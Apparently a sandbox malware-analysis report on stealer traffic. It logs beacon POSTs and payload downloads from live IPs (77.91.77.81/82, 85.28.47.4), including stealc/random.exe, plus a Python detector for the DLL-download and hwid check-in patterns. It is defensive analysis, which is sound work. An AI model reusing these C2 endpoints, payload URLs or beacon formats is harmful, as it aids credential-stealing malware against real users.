Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: Joe Sandbox View IP Address: 77.91.77.81 77.91.77.81
Source: Joe Sandbox View IP Address: 85.28.47.4 85.28.47.4
Source: Joe Sandbox View ASN Name: GES-ASRU GES-ASRU
Source: Joe Sandbox View ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F1BD30 InternetOpenW,InternetConnectA,HttpSendRequestA,InternetReadFile, 10_2_00F1BD30
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1 | Host: 85.28.47.4 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1 | Host: 85.28.47.4 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1 | Host: 85.28.47.4 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1 | Host: 85.28.47.4 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1 | Host: 85.28.47.4 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1 | Host: 85.28.47.4 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1 | Host: 85.28.47.4 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1 | Host: 77.91.77.81 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1 | Host: 77.91.77.81
Source: unknown HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBA | Host: 85.28.47.4 | Content-Length: 214 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 30 30 34 37 42 42 42 30 42 38 33 39 34 36 30 39 38 34 33 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 2d 2d 0d 0a | Data Ascii: ------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="hwid"F10047BBB0B83946098432------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="build"default------GCGCFCBAKKFBFIECAEBA--
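The HTTP lines above carry two patterns worth turning into a check: the GETs for sqlite3/freebl3/mozglue/nss3/softokn3 and the VC runtime from a bare-IP host (the NSS helper set stealers pull down to read Firefox credential stores, here from 85.28.47.4/69934896f997d5bb/), and the multipart POST to /920475a59bac849d.php whose only fields are "hwid" and "build". The following is an added example, not part of the sandbox report and not code from the sample: it parses raw HTTP requests, extracts multipart fields, and tags both behaviours. The request bytes are reconstructed from the report's flattened log lines with CRLFs restored; the hwid value is the one the report shows, and the tag names and the bare-IP heuristic are this example's own choices.

```python
"""Triage of captured HTTP requests for stealer download and check-in patterns.

Added example (not from the report or the sample). It flags:
  * GET of Mozilla NSS / SQLite helper DLLs from a host given as a bare IP,
  * multipart/form-data POST whose only fields are "hwid" and "build".
The sample requests at the bottom are reconstructed from the report lines.
"""
import re
from dataclasses import dataclass, field

# Helper DLLs the report shows being fetched from 85.28.47.4/69934896f997d5bb/.
STEALER_HELPER_DLLS = {
    "sqlite3.dll", "freebl3.dll", "mozglue.dll", "msvcp140.dll",
    "nss3.dll", "softokn3.dll", "vcruntime140.dll",
}
# Host header that is a literal IPv4 address (optionally with a port); this
# matches the "TCP traffic without corresponding DNS query" entries above.
BARE_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""


def parse_request(raw: bytes) -> HttpRequest:
    """Split a raw HTTP/1.1 request into request line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def multipart_fields(req: HttpRequest) -> dict:
    """Return {field_name: value} from a multipart/form-data body, else {}."""
    ctype = req.headers.get("content-type", "")
    match = re.search(r'boundary="?([^";]+)"?', ctype)
    if not ctype.startswith("multipart/form-data") or not match:
        return {}
    delimiter = b"--" + match.group(1).encode("latin-1")
    fields = {}
    for part in req.body.split(delimiter):
        part = part.strip(b"\r\n")
        if not part or part == b"--":          # preamble or closing delimiter
            continue
        part_head, _, part_body = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1).decode("latin-1")] = part_body.decode("latin-1")
    return fields


def classify(req: HttpRequest) -> list:
    """Return detection tags for one request; an empty list means no match."""
    tags = []
    bare_ip_host = BARE_IPV4.match(req.headers.get("host", "")) is not None
    filename = req.path.rsplit("/", 1)[-1].lower()
    if req.method == "GET" and bare_ip_host and filename in STEALER_HELPER_DLLS:
        tags.append("nss-helper-dll-download")
    if req.method == "POST" and set(multipart_fields(req)) == {"hwid", "build"}:
        tags.append("stealer-checkin-hwid-build")
    return tags


# --- constructed samples, rebuilt from the report's flattened lines ---------
SAMPLE_DLL_GET = b"".join([
    b"GET /69934896f997d5bb/nss3.dll HTTP/1.1\r\n",
    b"Host: 85.28.47.4\r\n",
    b"Cache-Control: no-cache\r\n\r\n",
])

CHECKIN_BOUNDARY = b"----GCGCFCBAKKFBFIECAEBA"
CHECKIN_BODY = b"".join([
    b"--" + CHECKIN_BOUNDARY + b"\r\n",
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n',
    b"F10047BBB0B83946098432\r\n",
    b"--" + CHECKIN_BOUNDARY + b"\r\n",
    b'Content-Disposition: form-data; name="build"\r\n\r\n',
    b"default\r\n",
    b"--" + CHECKIN_BOUNDARY + b"--\r\n",
])
SAMPLE_CHECKIN_POST = b"".join([
    b"POST /920475a59bac849d.php HTTP/1.1\r\n",
    b"Content-Type: multipart/form-data; boundary=" + CHECKIN_BOUNDARY + b"\r\n",
    b"Host: 85.28.47.4\r\n",
    b"Content-Length: " + str(len(CHECKIN_BODY)).encode() + b"\r\n",
    b"Connection: Keep-Alive\r\n",
    b"Cache-Control: no-cache\r\n\r\n",
    CHECKIN_BODY,
])

if __name__ == "__main__":
    for raw in (SAMPLE_DLL_GET, SAMPLE_CHECKIN_POST):
        req = parse_request(raw)
        print(req.method, req.path, classify(req), multipart_fields(req))
```

The reconstructed check-in body is 214 bytes, which is the Content-Length the report recorded, so the CRLF placement matches the captured Data Raw. The bare-IP test is deliberately narrow; legitimate software rarely fetches the NSS libraries over plain HTTP from an address with no DNS name, which is what makes the download set a usable signal even when the path token changes.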
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.0000000000548000.00000040.00000001.01000000.00000003.sdmp, Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.0000000000548000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe00
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.0000000000548000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exeAppData
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.0000000000548000.00000040.00000001.01000000.00000003.sdmp, Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A28000.00000004.00000020.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.0000000000548000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe-Disposition:
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.0000000000548000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe00
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exeFr
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe5067
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exeS
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exeX
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exeurlencoded
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018F1000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3339390181.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3339390181.00000000018B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php-
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php5
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php=
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpV
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpa=
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpe
Source: explorti.exe, 0000000A.00000002.3339390181.00000000018DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpg
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019EE000.00000004.00000020.00020000.00000000.sdmp, 6e6e496542.exe, 0000000C.00000002.2417828325.00000000016FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp, 6e6e496542.exe, 0000000C.00000002.2417828325.000000000174E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.000000000174E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/6
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A28000.00000004.00000020.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/freebl3.dll
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dll
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dllV
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dll
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dll
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dllBn
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dllb
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dllh
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dll
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllm
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A05000.00000004.00000020.00020000.00000000.sdmp, 6e6e496542.exe, 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp, 6e6e496542.exe, 0000000C.00000002.2417828325.000000000174E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.000000000174E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpZ
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpft
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.000000000174E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phps
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.000000000174E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpu
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/y
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
